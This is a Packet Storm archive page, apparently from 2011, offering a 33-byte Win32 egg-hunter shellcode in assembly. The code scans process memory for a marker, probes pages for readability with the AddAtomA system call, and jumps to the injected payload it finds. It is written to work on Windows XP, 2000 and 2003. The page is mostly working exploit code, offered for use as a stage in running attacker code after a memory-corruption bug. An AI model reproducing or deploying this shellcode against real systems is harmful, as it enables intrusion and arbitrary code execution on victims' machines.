exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Win32 Eggsearch Shellcode

Win32 Eggsearch Shellcode
Posted Mar 6, 2011
Authored by Georg Wicherski

33 bytes small Win32 egg searching shellcode that should work on all service packs of Microsoft Windows XP, 2k, and 2k3.

tags | exploit, shellcode
systems | windows
SHA-256 | a3fdc6212003167dc8efabb25a79281a17b7444f1b70093d9d231b75c36cc560

Win32 Eggsearch Shellcode

Change Mirror Download
; win32 eggsearch shellcode, 33 bytes
; tested on windows xp sp2, should work on all service packs on win2k, win xp, win2k3
; (c) 2009 by Georg 'oxff' Wicherski

[bits 32]

marker equ 0x1f217767 ; 'gw!\x1f'

start:
xor edx, edx ; edx = 0, pointer to examined address

address_loop:
inc edx ; edx++, try next address

pagestart_check:
test dx, 0x0ffc ; are we within the first 4 bytes of a page?
jz address_loop ; if so, try next address as previous page might be unreadable
; and the cmp [edx-4], marker might result in a segmentation fault

access_check:
push edx ; save across syscall
push byte 8 ; eax = 8, syscall nr of AddAtomA
pop eax ; ^
int 0x2e ; fire syscall (eax = 8, edx = ptr)
cmp al, 0x05 ; is result 0xc0000005? (a bit sloppy)
pop edx ;

je address_loop ; jmp if result was 0xc0000005

egg_check:
cmp dword [edx-4], marker ; is our egg right before examined address?
jne address_loop ; if not, try next address

egg_execute:
inc ebx ; make sure, zf is not set
jmp edx ; we found our egg at [edx-4], so we can jmp to edx

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close